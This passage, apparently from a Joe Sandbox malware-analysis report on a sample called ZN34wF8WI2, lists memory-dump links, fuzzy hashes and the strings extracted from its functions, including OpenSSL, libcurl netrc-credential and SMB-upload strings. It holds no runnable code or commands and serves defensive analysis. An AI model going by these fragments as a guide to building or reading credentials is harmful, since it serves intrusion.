                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                  • API String ID: 0-2058201250
                                  • Opcode ID: a51960a76878e5ad37ab2776e09d981091d72d6de86eeca4efe446c4dc08cd6c
                                  • Instruction ID: 2ac44e55e01796cd840d33936d61e32065967732c21f2523f990716d05822484
                                  • Opcode Fuzzy Hash: a51960a76878e5ad37ab2776e09d981091d72d6de86eeca4efe446c4dc08cd6c
                                  • Instruction Fuzzy Hash: 6E61EDE9B0830077D794A625AC56F3B7299AB95308F04443FFC4A96383FE79ED148257
                                  Function 00425DB0 Relevance: 10.1, Strings: 8, Instructions: 114COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                  • API String ID: 0-3476178709
                                  • Opcode ID: d43c0dfaf838a783e90d371f5106d5d79fd6e203dc8a9cd807ac8823865769a0
                                  • Instruction ID: dfdde5d4cefa1a30856d5ac5156d6b3e8bfd589fe22715601bcb55f6918202f8
                                  • Opcode Fuzzy Hash: d43c0dfaf838a783e90d371f5106d5d79fd6e203dc8a9cd807ac8823865769a0
                                  • Instruction Fuzzy Hash: EC31D772764A5836F7280119EC86F3E105BD3C5B10FAAC63FB50A9B2C2D8F99D0541AE
                                  Function 005D0D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                  • API String ID: 0-2550110336
                                  • Opcode ID: 945f3b99da1bbb12367c7154461292172c7311f8deccf7698cf68e5546942d99
                                  • Instruction ID: ce0e84dedbca2b4c186797a9ec698edd05127ac0ab41d49882a77bae68b4892c
                                  • Opcode Fuzzy Hash: 945f3b99da1bbb12367c7154461292172c7311f8deccf7698cf68e5546942d99
                                  • Instruction Fuzzy Hash: 00321334648706BFD630AA689C4AF2A7F95FF84704F18881FF9485A3C2E6B5D950C74A
                                  Function 004DEF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$;$?$?$xn--$xn--
                                  • API String ID: 0-543057197
                                  • Opcode ID: c565d91aa7018373331c52e36477c6f416b00cc5262f679e33fc2fd78ff3a091
                                  • Instruction ID: 9d9cb50bcfcb23f94372b55a087cc3656b2b5887263a8ddeca85799d77ac8a42
                                  • Opcode Fuzzy Hash: c565d91aa7018373331c52e36477c6f416b00cc5262f679e33fc2fd78ff3a091
                                  • Instruction Fuzzy Hash: DE2246B1A043419BEB309A65DC51B6B72D4AF90308F04043FF85A97392E779ED49C79B
                                  Function 0041A960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: e80314128b0b8313b692a82f4dfa60ebfac3f528c5beeb03b055734784b79fa3
                                  • Instruction ID: 4e126f32996eb149bbd1d68e23f5542e57742ed6a7c3d27069790cdab8db40e8
                                  • Opcode Fuzzy Hash: e80314128b0b8313b692a82f4dfa60ebfac3f528c5beeb03b055734784b79fa3
                                  • Instruction Fuzzy Hash: 76C28D716083419FC714CF28C4907AAB7E2FFC9354F15892EE8999B351D738ED868B86
                                  Function 0041E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 0-2555271450
                                  • Opcode ID: a28874868662dd5535d8deae7fffc57d4fd25348aea8edd7ec229484f07a64dd
                                  • Instruction ID: 90713e8077cf5a2636666b742ee955759152aff14edaaafe7aeb36a8109bc247
                                  • Opcode Fuzzy Hash: a28874868662dd5535d8deae7fffc57d4fd25348aea8edd7ec229484f07a64dd
                                  • Instruction Fuzzy Hash: 5382D375A083019FD714CE19C88076BB7E1AFC5324F148A2EF8A997391D738DC8ACB56
                                  Function 00476210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: default$login$macdef$machine$netrc.c$password
                                  • API String ID: 0-1043775505
                                  • Opcode ID: f6c27ae8c3a6da60405687f3be3b6f9e4d3ad2b9796fe902b8d58bc01d6f987a
                                  • Instruction ID: 0eca4098fff779ca3589c647537d9cae2e369afa228a674d56da5174dafce1f5
                                  • Opcode Fuzzy Hash: f6c27ae8c3a6da60405687f3be3b6f9e4d3ad2b9796fe902b8d58bc01d6f987a
                                  • Instruction Fuzzy Hash: 9DE14871508741ABE3109E11D8817AB7BD2AF91348F15882EFC8C5B382E3BDD949C79B
                                  Function 0047A7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                  • API String ID: 0-4201740241
                                  • Opcode ID: 070530c0be3b6a41cd87a0e3e1f4bf2d314a930b872e955aa8000ef37f8125bc
                                  • Instruction ID: af59b7e607366867e318f9f0dc02ec8090695dd81fefce40d88b770668fe5ce9
                                  • Opcode Fuzzy Hash: 070530c0be3b6a41cd87a0e3e1f4bf2d314a930b872e955aa8000ef37f8125bc
                                  • Instruction Fuzzy Hash: 1B62C2B0614741DBD714CF24C4907AAB7E4FF98304F04961EE88D8B352E779EA94CB9A
                                  Function 00793A70 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                  • API String ID: 0-2839762339
                                  • Opcode ID: ba4f6a7f8c3fcc9f494f527314f1956468dedd439fa5b0e36f2418a6afcce0c9
                                  • Instruction ID: c5b8818014a9d8bdab3c40cc59a65245c37916f427a9e8b3207f08cff255d0ed
                                  • Opcode Fuzzy Hash: ba4f6a7f8c3fcc9f494f527314f1956468dedd439fa5b0e36f2418a6afcce0c9
                                  • Instruction Fuzzy Hash: D4020BB1A083419FDF259F24E845B6BB7E5EF55300F04886CE98987382EB79E905C793
                                  Function 004CC900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                  • API String ID: 0-3285806060
                                  • Opcode ID: bf462ee21cfea02d60b2977d6085042ec1061c5bc2a2102b8c878ca6c6ccf0b5
                                  • Instruction ID: 85a7b07251ae9595f0974075665481c066ca2d4cfd0e9b707d9a7da2ecd24650
                                  • Opcode Fuzzy Hash: bf462ee21cfea02d60b2977d6085042ec1061c5bc2a2102b8c878ca6c6ccf0b5
                                  • Instruction Fuzzy Hash: 71D1E679A083058BD7649E28D8C1B7B77D1AF91304F14493EE8CE97381E6389C45D747
                                  Function 0079CC90 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$@$gfff$gfff
                                  • API String ID: 0-2633265772
                                  • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction ID: 65be5f2e1428f7df29a4d389730e2927af3cb958cdc35ed0d8d65812ac113b0d
                                  • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                  • Instruction Fuzzy Hash: 98D1E3726087058BDF15DF29E58432BBBE2AF80344F18C92DE8498B355E778DD09CB92
                                  Function 007A17A0 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
